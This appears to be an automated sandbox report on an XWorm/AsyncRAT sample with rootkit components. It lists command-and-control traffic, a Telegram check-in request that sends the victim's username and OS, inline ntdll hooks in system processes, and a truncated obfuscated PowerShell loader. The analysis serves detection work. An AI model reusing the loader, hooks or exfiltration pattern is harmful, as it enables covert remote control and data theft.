                                                      .reloc0x820000xc0x200ff2fc218b8f6e1dd234f0dbec2c8f47fFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                      Resources

                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                      RT_VERSION0x800a00x254data0.46476510067114096
                                                      RT_MANIFEST0x802f40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                                                      Imports

                                                      DLLImport
                                                      mscoree.dll_CorExeMain

                                                      Network Behavior

                                                      Suricata IDS Alerts

                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                      2024-10-13T19:15:38.561396+02002855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.449738147.185.221.2128600TCP
                                                      2024-10-13T19:15:49.657430+02002853685ETPRO MALWARE Win32/XWorm Checkin via Telegram1192.168.2.449739149.154.167.220443TCP

                                                      Network Port Distribution

                                                      TCP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Oct 13, 2024 19:15:03.640660048 CEST4973080192.168.2.4208.95.112.1
                                                      Oct 13, 2024 19:15:03.645598888 CEST8049730208.95.112.1192.168.2.4
                                                      Oct 13, 2024 19:15:03.648997068 CEST4973080192.168.2.4208.95.112.1
                                                      Oct 13, 2024 19:15:03.650500059 CEST4973080192.168.2.4208.95.112.1
                                                      Oct 13, 2024 19:15:03.655415058 CEST8049730208.95.112.1192.168.2.4
                                                      Oct 13, 2024 19:15:04.163295984 CEST8049730208.95.112.1192.168.2.4
                                                      Oct 13, 2024 19:15:04.217112064 CEST4973080192.168.2.4208.95.112.1
                                                      Oct 13, 2024 19:15:05.331224918 CEST4973128600192.168.2.4147.185.221.21
                                                      Oct 13, 2024 19:15:05.337301970 CEST2860049731147.185.221.21192.168.2.4
                                                      Oct 13, 2024 19:15:05.337377071 CEST4973128600192.168.2.4147.185.221.21
                                                      Oct 13, 2024 19:15:05.635096073 CEST4973128600192.168.2.4147.185.221.21
                                                      Oct 13, 2024 19:15:05.640022993 CEST2860049731147.185.221.21192.168.2.4
                                                      Oct 13, 2024 19:15:18.427524090 CEST4973128600192.168.2.4147.185.221.21
                                                      Oct 13, 2024 19:15:18.432459116 CEST2860049731147.185.221.21192.168.2.4
                                                      Oct 13, 2024 19:15:26.716367960 CEST2860049731147.185.221.21192.168.2.4
                                                      Oct 13, 2024 19:15:26.717092991 CEST4973128600192.168.2.4147.185.221.21
                                                      Oct 13, 2024 19:15:27.280029058 CEST4973128600192.168.2.4147.185.221.21
                                                      Oct 13, 2024 19:15:27.285273075 CEST2860049731147.185.221.21192.168.2.4
                                                      Oct 13, 2024 19:15:27.302357912 CEST4973828600192.168.2.4147.185.221.21
                                                      Oct 13, 2024 19:15:27.307204962 CEST2860049738147.185.221.21192.168.2.4
                                                      Oct 13, 2024 19:15:27.307274103 CEST4973828600192.168.2.4147.185.221.21
                                                      Oct 13, 2024 19:15:27.377914906 CEST4973828600192.168.2.4147.185.221.21
                                                      Oct 13, 2024 19:15:27.382849932 CEST2860049738147.185.221.21192.168.2.4
                                                      Oct 13, 2024 19:15:38.561395884 CEST4973828600192.168.2.4147.185.221.21
                                                      Oct 13, 2024 19:15:38.568368912 CEST2860049738147.185.221.21192.168.2.4
                                                      Oct 13, 2024 19:15:48.197601080 CEST49739443192.168.2.4149.154.167.220
                                                      Oct 13, 2024 19:15:48.197711945 CEST44349739149.154.167.220192.168.2.4
                                                      Oct 13, 2024 19:15:48.197810888 CEST49739443192.168.2.4149.154.167.220
                                                      Oct 13, 2024 19:15:48.212207079 CEST49739443192.168.2.4149.154.167.220
                                                      Oct 13, 2024 19:15:48.212248087 CEST44349739149.154.167.220192.168.2.4
                                                      Oct 13, 2024 19:15:48.688169003 CEST2860049738147.185.221.21192.168.2.4
                                                      Oct 13, 2024 19:15:48.688262939 CEST4973828600192.168.2.4147.185.221.21
                                                      Oct 13, 2024 19:15:48.832576036 CEST44349739149.154.167.220192.168.2.4
                                                      Oct 13, 2024 19:15:48.832680941 CEST49739443192.168.2.4149.154.167.220
                                                      Oct 13, 2024 19:15:49.044614077 CEST49739443192.168.2.4149.154.167.220
                                                      Oct 13, 2024 19:15:49.044711113 CEST44349739149.154.167.220192.168.2.4
                                                      Oct 13, 2024 19:15:49.045017958 CEST44349739149.154.167.220192.168.2.4
                                                      Oct 13, 2024 19:15:49.092051983 CEST49739443192.168.2.4149.154.167.220
                                                      Oct 13, 2024 19:15:49.484347105 CEST49739443192.168.2.4149.154.167.220
                                                      Oct 13, 2024 19:15:49.527448893 CEST44349739149.154.167.220192.168.2.4
                                                      Oct 13, 2024 19:15:49.657393932 CEST44349739149.154.167.220192.168.2.4
                                                      Oct 13, 2024 19:15:49.657460928 CEST44349739149.154.167.220192.168.2.4
                                                      Oct 13, 2024 19:15:49.657609940 CEST49739443192.168.2.4149.154.167.220
                                                      Oct 13, 2024 19:15:49.675430059 CEST49739443192.168.2.4149.154.167.220
                                                      Oct 13, 2024 19:15:49.815711021 CEST4974060075192.168.2.4147.185.221.20
                                                      Oct 13, 2024 19:15:49.820631027 CEST6007549740147.185.221.20192.168.2.4
                                                      Oct 13, 2024 19:15:49.820708990 CEST4974060075192.168.2.4147.185.221.20
                                                      Oct 13, 2024 19:15:49.840579033 CEST4974060075192.168.2.4147.185.221.20
                                                      Oct 13, 2024 19:15:49.845840931 CEST6007549740147.185.221.20192.168.2.4
                                                      Oct 13, 2024 19:15:50.407160044 CEST4973828600192.168.2.4147.185.221.21
                                                      Oct 13, 2024 19:15:50.412215948 CEST2860049738147.185.221.21192.168.2.4
                                                      Oct 13, 2024 19:15:50.412928104 CEST4974128600192.168.2.4147.185.221.21
                                                      Oct 13, 2024 19:15:50.417965889 CEST2860049741147.185.221.21192.168.2.4
                                                      Oct 13, 2024 19:15:50.418071985 CEST4974128600192.168.2.4147.185.221.21
                                                      Oct 13, 2024 19:15:50.472738028 CEST4974128600192.168.2.4147.185.221.21
                                                      Oct 13, 2024 19:15:50.477808952 CEST2860049741147.185.221.21192.168.2.4
                                                      Oct 13, 2024 19:16:04.171905041 CEST4974060075192.168.2.4147.185.221.20
                                                      Oct 13, 2024 19:16:04.176759005 CEST6007549740147.185.221.20192.168.2.4
                                                      Oct 13, 2024 19:16:04.297403097 CEST4974128600192.168.2.4147.185.221.21
                                                      Oct 13, 2024 19:16:04.302705050 CEST2860049741147.185.221.21192.168.2.4
                                                      Oct 13, 2024 19:16:04.940265894 CEST8049730208.95.112.1192.168.2.4
                                                      Oct 13, 2024 19:16:04.940334082 CEST4973080192.168.2.4208.95.112.1
                                                      Oct 13, 2024 19:16:11.219939947 CEST6007549740147.185.221.20192.168.2.4
                                                      Oct 13, 2024 19:16:11.220133066 CEST4974060075192.168.2.4147.185.221.20
                                                      Oct 13, 2024 19:16:11.794816017 CEST2860049741147.185.221.21192.168.2.4
                                                      Oct 13, 2024 19:16:11.795072079 CEST4974128600192.168.2.4147.185.221.21
                                                      Oct 13, 2024 19:16:11.821845055 CEST4974128600192.168.2.4147.185.221.21
                                                      Oct 13, 2024 19:16:11.825458050 CEST4983728600192.168.2.4147.185.221.21
                                                      Oct 13, 2024 19:16:11.826886892 CEST2860049741147.185.221.21192.168.2.4
                                                      Oct 13, 2024 19:16:11.830461025 CEST2860049837147.185.221.21192.168.2.4
                                                      Oct 13, 2024 19:16:11.830548048 CEST4983728600192.168.2.4147.185.221.21
                                                      Oct 13, 2024 19:16:11.989213943 CEST4983728600192.168.2.4147.185.221.21
                                                      Oct 13, 2024 19:16:11.994463921 CEST2860049837147.185.221.21192.168.2.4
                                                      Oct 13, 2024 19:16:12.874845028 CEST4974060075192.168.2.4147.185.221.20
                                                      Oct 13, 2024 19:16:12.880217075 CEST6007549740147.185.221.20192.168.2.4
                                                      Oct 13, 2024 19:16:12.881263971 CEST4983860075192.168.2.4147.185.221.20
                                                      Oct 13, 2024 19:16:12.886713982 CEST6007549838147.185.221.20192.168.2.4
                                                      Oct 13, 2024 19:16:12.886820078 CEST4983860075192.168.2.4147.185.221.20
                                                      Oct 13, 2024 19:16:13.206939936 CEST4983860075192.168.2.4147.185.221.20
                                                      Oct 13, 2024 19:16:13.212066889 CEST6007549838147.185.221.20192.168.2.4
                                                      Oct 13, 2024 19:16:33.216303110 CEST2860049837147.185.221.21192.168.2.4
                                                      Oct 13, 2024 19:16:33.217964888 CEST4983728600192.168.2.4147.185.221.21
                                                      Oct 13, 2024 19:16:34.267072916 CEST6007549838147.185.221.20192.168.2.4
                                                      Oct 13, 2024 19:16:34.267155886 CEST4983860075192.168.2.4147.185.221.20
                                                      Oct 13, 2024 19:16:37.596194983 CEST4983728600192.168.2.4147.185.221.21
                                                      Oct 13, 2024 19:16:37.601551056 CEST2860049837147.185.221.21192.168.2.4
                                                      Oct 13, 2024 19:16:56.810834885 CEST4983860075192.168.2.4147.185.221.20
                                                      Oct 13, 2024 19:16:56.812180996 CEST4985160075192.168.2.4147.185.221.20
                                                      Oct 13, 2024 19:16:56.816430092 CEST6007549838147.185.221.20192.168.2.4
                                                      Oct 13, 2024 19:16:56.817178011 CEST6007549851147.185.221.20192.168.2.4
                                                      Oct 13, 2024 19:16:56.817256927 CEST4985160075192.168.2.4147.185.221.20
                                                      Oct 13, 2024 19:17:13.291224003 CEST4973080192.168.2.4208.95.112.1
                                                      Oct 13, 2024 19:17:13.301399946 CEST4985160075192.168.2.4147.185.221.20
                                                      Oct 13, 2024 19:17:13.306267023 CEST6007549851147.185.221.20192.168.2.4
                                                      Oct 13, 2024 19:17:13.591873884 CEST4973080192.168.2.4208.95.112.1
                                                      Oct 13, 2024 19:17:13.946995020 CEST4987728600192.168.2.4147.185.221.21
                                                      Oct 13, 2024 19:17:13.951889992 CEST2860049877147.185.221.21192.168.2.4
                                                      Oct 13, 2024 19:17:13.952009916 CEST4987728600192.168.2.4147.185.221.21
                                                      Oct 13, 2024 19:17:14.029781103 CEST4987728600192.168.2.4147.185.221.21
                                                      Oct 13, 2024 19:17:14.034765959 CEST2860049877147.185.221.21192.168.2.4
                                                      Oct 13, 2024 19:17:14.201272964 CEST4973080192.168.2.4208.95.112.1
                                                      Oct 13, 2024 19:17:15.404361963 CEST4973080192.168.2.4208.95.112.1
                                                      Oct 13, 2024 19:17:16.280477047 CEST5258153192.168.2.41.1.1.1
                                                      Oct 13, 2024 19:17:16.285481930 CEST53525811.1.1.1192.168.2.4
                                                      Oct 13, 2024 19:17:16.285557032 CEST5258153192.168.2.41.1.1.1
                                                      Oct 13, 2024 19:17:16.285820961 CEST5258153192.168.2.41.1.1.1
                                                      Oct 13, 2024 19:17:16.290602922 CEST53525811.1.1.1192.168.2.4
                                                      Oct 13, 2024 19:17:16.749023914 CEST53525811.1.1.1192.168.2.4
                                                      Oct 13, 2024 19:17:16.794971943 CEST5258153192.168.2.41.1.1.1
                                                      Oct 13, 2024 19:17:17.810609102 CEST4973080192.168.2.4208.95.112.1

                                                      UDP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Oct 13, 2024 19:15:03.624383926 CEST5961553192.168.2.41.1.1.1
                                                      Oct 13, 2024 19:15:03.632144928 CEST53596151.1.1.1192.168.2.4
                                                      Oct 13, 2024 19:15:05.292115927 CEST5667353192.168.2.41.1.1.1
                                                      Oct 13, 2024 19:15:05.325293064 CEST53566731.1.1.1192.168.2.4
                                                      Oct 13, 2024 19:15:27.289050102 CEST5688953192.168.2.41.1.1.1
                                                      Oct 13, 2024 19:15:27.301724911 CEST53568891.1.1.1192.168.2.4
                                                      Oct 13, 2024 19:15:48.189029932 CEST5217753192.168.2.41.1.1.1
                                                      Oct 13, 2024 19:15:48.196780920 CEST53521771.1.1.1192.168.2.4
                                                      Oct 13, 2024 19:15:49.801489115 CEST6341653192.168.2.41.1.1.1
                                                      Oct 13, 2024 19:15:49.815073013 CEST53634161.1.1.1192.168.2.4
                                                      Oct 13, 2024 19:17:16.280061007 CEST53560301.1.1.1192.168.2.4

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Oct 13, 2024 19:15:03.624383926 CEST192.168.2.41.1.1.10x75ceStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                      Oct 13, 2024 19:15:05.292115927 CEST192.168.2.41.1.1.10xec1cStandard query (0)subscribe-bond.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                      Oct 13, 2024 19:15:27.289050102 CEST192.168.2.41.1.1.10xe5faStandard query (0)subscribe-bond.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                      Oct 13, 2024 19:15:48.189029932 CEST192.168.2.41.1.1.10xf6b0Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                      Oct 13, 2024 19:15:49.801489115 CEST192.168.2.41.1.1.10x94b0Standard query (0)updates-full.gl.at.ply.ggA (IP address)IN (0x0001)false

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Oct 13, 2024 19:15:03.632144928 CEST1.1.1.1192.168.2.40x75ceNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                      Oct 13, 2024 19:15:05.325293064 CEST1.1.1.1192.168.2.40xec1cNo error (0)subscribe-bond.gl.at.ply.gg147.185.221.21A (IP address)IN (0x0001)false
                                                      Oct 13, 2024 19:15:27.301724911 CEST1.1.1.1192.168.2.40xe5faNo error (0)subscribe-bond.gl.at.ply.gg147.185.221.21A (IP address)IN (0x0001)false
                                                      Oct 13, 2024 19:15:48.196780920 CEST1.1.1.1192.168.2.40xf6b0No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                      Oct 13, 2024 19:15:49.815073013 CEST1.1.1.1192.168.2.40x94b0No error (0)updates-full.gl.at.ply.gg147.185.221.20A (IP address)IN (0x0001)false

                                                      HTTP Request Dependency Graph

                                                      • api.telegram.org
                                                      • ip-api.com

                                                      HTTP Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.449730208.95.112.1805804C:\Users\Public\DeadROOTkit.exe
                                                      TimestampBytes transferredDirectionData
                                                      Oct 13, 2024 19:15:03.650500059 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                                      Host: ip-api.com
                                                      Connection: Keep-Alive
                                                      Oct 13, 2024 19:15:04.163295984 CEST175INHTTP/1.1 200 OK
                                                      Date: Sun, 13 Oct 2024 17:15:03 GMT
                                                      Content-Type: text/plain; charset=utf-8
                                                      Content-Length: 6
                                                      Access-Control-Allow-Origin: *
                                                      X-Ttl: 60
                                                      X-Rl: 44
                                                      Data Raw: 66 61 6c 73 65 0a
                                                      Data Ascii: false


                                                      HTTPS Proxied Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.449739149.154.167.2204435804C:\Users\Public\DeadROOTkit.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-10-13 17:15:49 UTC285OUTGET /botYour_Token/sendMessage?chat_id=Your_ID&text=%E2%98%A0%20%5BXWorm%20V3.0%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A161EDF6F280165B1D298%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro HTTP/1.1
                                                      Host: api.telegram.org
                                                      Connection: Keep-Alive
                                                      2024-10-13 17:15:49 UTC344INHTTP/1.1 404 Not Found
                                                      Server: nginx/1.18.0
                                                      Date: Sun, 13 Oct 2024 17:15:49 GMT
                                                      Content-Type: application/json
                                                      Content-Length: 55
                                                      Connection: close
                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                      Access-Control-Allow-Origin: *
                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                      2024-10-13 17:15:49 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                      Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                      Code Manipulations

                                                      User Modules

                                                      Hook Summary

                                                      Function NameHook TypeActive in Processes
                                                      ZwEnumerateKeyINLINEexplorer.exe, winlogon.exe
                                                      NtQuerySystemInformationINLINEexplorer.exe, winlogon.exe
                                                      ZwResumeThreadINLINEexplorer.exe, winlogon.exe
                                                      NtDeviceIoControlFileINLINEexplorer.exe, winlogon.exe
                                                      ZwDeviceIoControlFileINLINEexplorer.exe, winlogon.exe
                                                      NtEnumerateKeyINLINEexplorer.exe, winlogon.exe
                                                      NtQueryDirectoryFileINLINEexplorer.exe, winlogon.exe
                                                      ZwEnumerateValueKeyINLINEexplorer.exe, winlogon.exe
                                                      ZwQuerySystemInformationINLINEexplorer.exe, winlogon.exe
                                                      NtResumeThreadINLINEexplorer.exe, winlogon.exe
                                                      RtlGetNativeSystemInformationINLINEexplorer.exe, winlogon.exe
                                                      NtQueryDirectoryFileExINLINEexplorer.exe, winlogon.exe
                                                      NtEnumerateValueKeyINLINEexplorer.exe, winlogon.exe
                                                      ZwQueryDirectoryFileExINLINEexplorer.exe, winlogon.exe
                                                      ZwQueryDirectoryFileINLINEexplorer.exe, winlogon.exe

                                                      Processes

                                                      Process: explorer.exe, Module: ntdll.dll
                                                      Function NameHook TypeNew Data
                                                      ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                      NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                      ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                      NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                      ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                      NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                      NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                      ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                      ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                      NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                      RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                      NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                      NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                      ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                      ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                      Process: winlogon.exe, Module: ntdll.dll
                                                      Function NameHook TypeNew Data
                                                      ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                      NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                      ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                      NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                      ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                      NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                      NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                      ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                      ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                      NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                      RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                      NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                      NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                      ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                      ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF

                                                      Statistics

                                                      CPU Usage

                                                      Click to jump to process

                                                      Memory Usage

                                                      Click to jump to process

                                                      High Level Behavior Distribution

                                                      Click to dive into process behavior distribution

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      General

                                                      Target ID:0
                                                      Start time:13:14:55
                                                      Start date:13/10/2024
                                                      Path:C:\Users\user\Desktop\mIURiU8n2P.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Users\user\Desktop\mIURiU8n2P.exe"
                                                      Imagebase:0x370000
                                                      File size:512'512 bytes
                                                      MD5 hash:E1C82191B678CEA8F3C996887DDC1232
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.1703934967.0000000002781000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1703934967.0000000002781000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.1703934967.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1703934967.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1703934967.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                      Reputation:low
                                                      Has exited:true

                                                      General

                                                      Target ID:1
                                                      Start time:13:14:58
                                                      Start date:13/10/2024
                                                      Path:C:\Users\Public\DeadXClient.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Users\Public\DeadXClient.exe"
                                                      Imagebase:0x680000
                                                      File size:35'840 bytes
                                                      MD5 hash:F1976EA02BFFAEF5AC943C2ABBB7426C
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000001.00000000.1700076185.0000000000682000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000001.00000000.1700076185.0000000000682000.00000002.00000001.01000000.00000007.sdmp, Author: ditekSHen
                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\Public\DeadXClient.exe, Author: Joe Security
                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\Public\DeadXClient.exe, Author: ditekSHen
                                                      Antivirus matches:
                                                      • Detection: 100%, Avira
                                                      • Detection: 100%, Joe Sandbox ML
                                                      • Detection: 96%, ReversingLabs
                                                      • Detection: 71%, Virustotal, Browse
                                                      Reputation:low
                                                      Has exited:false

                                                      General

                                                      Target ID:2
                                                      Start time:13:14:59
                                                      Start date:13/10/2024
                                                      Path:C:\Users\Public\DeadROOTkit.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Users\Public\DeadROOTkit.exe"
                                                      Imagebase:0x1a0000
                                                      File size:43'520 bytes
                                                      MD5 hash:7DD98FC2976EE270A278E1A9A28EEFAE
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000002.00000000.1701692705.00000000001A2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000000.1701692705.00000000001A2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000002.00000000.1701692705.00000000001A2000.00000002.00000001.01000000.00000008.sdmp, Author: ditekSHen
                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000002.00000002.2956134718.0000000002311000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\Public\DeadROOTkit.exe, Author: Joe Security
                                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\Public\DeadROOTkit.exe, Author: Joe Security
                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\Public\DeadROOTkit.exe, Author: Joe Security
                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\Public\DeadROOTkit.exe, Author: ditekSHen
                                                      Antivirus matches:
                                                      • Detection: 100%, Avira
                                                      • Detection: 100%, Joe Sandbox ML
                                                      • Detection: 88%, ReversingLabs
                                                      • Detection: 64%, Virustotal, Browse
                                                      Reputation:low
                                                      Has exited:false

                                                      General

                                                      Target ID:3
                                                      Start time:13:14:59
                                                      Start date:13/10/2024
                                                      Path:C:\Users\Public\DeadCodeRootKit.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\Public\DeadCodeRootKit.exe"
                                                      Imagebase:0xb00000
                                                      File size:155'136 bytes
                                                      MD5 hash:B8479A23C22CF6FC456E197939284069
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Antivirus matches:
                                                      • Detection: 100%, Avira
                                                      • Detection: 100%, Joe Sandbox ML
                                                      • Detection: 92%, ReversingLabs
                                                      • Detection: 82%, Virustotal, Browse
                                                      Reputation:low
                                                      Has exited:true

                                                      General

                                                      Target ID:4
                                                      Start time:13:14:59
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:bubCglTffNzZ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$QBDRAqnALMmwja,[Parameter(Position=1)][Type]$duQqlSyxSK)$pNdjVVbnfJT=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+''+[Char](77)+''+'e'+''+[Char](109)+''+'o'+''+'r'+'y'+[Char](77)+'o'+[Char](100)+''+[Char](117)+'l'+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+'De'+'l'+'e'+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+''+'T'+''+'y'+''+'p'+''+'e'+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+'u'+'b'+'l'+[Char](105)+''+[Char](99)+','+'S'+''+'e'+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d,A'+[Char](110)+''+[Char](115)+'i'+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+'Au'+[Char](116)+''+'o'+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$pNdjVVbnfJT.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+[Char](112)+''+'e'+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+'N'+''+[Char](97)+'m'+[Char](101)+''+','+''+'H'+''+[Char](105)+''+'d'+''+'e'+''+[Char](66)+'y'+[Char](83)+'i'+'g'+''+[Char](44)+''+'P'+''+[Char](117)+''+[Char](98)+''+'l'+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$QBDRAqnALMmwja).SetImplementationFlags('R'+[Char](117)+''+'n'+'t'+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$pNdjVVbnfJT.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+'e'+'',''+'P'+''+[Char](117)+'bl'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+'i'+''+[Char](100)+'e'+'B'+''+[Char](121)+''+'S'+''+'i'+''+'g'+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+'t'+','+[Char](86)+''+[Char](105)+'r'+[Char](116)+'u'+'a'+''+'l'+'',$duQqlSyxSK,$QBDRAqnALMmwja).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+'e'+[Char](44)+''+'M'+'a'+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+[C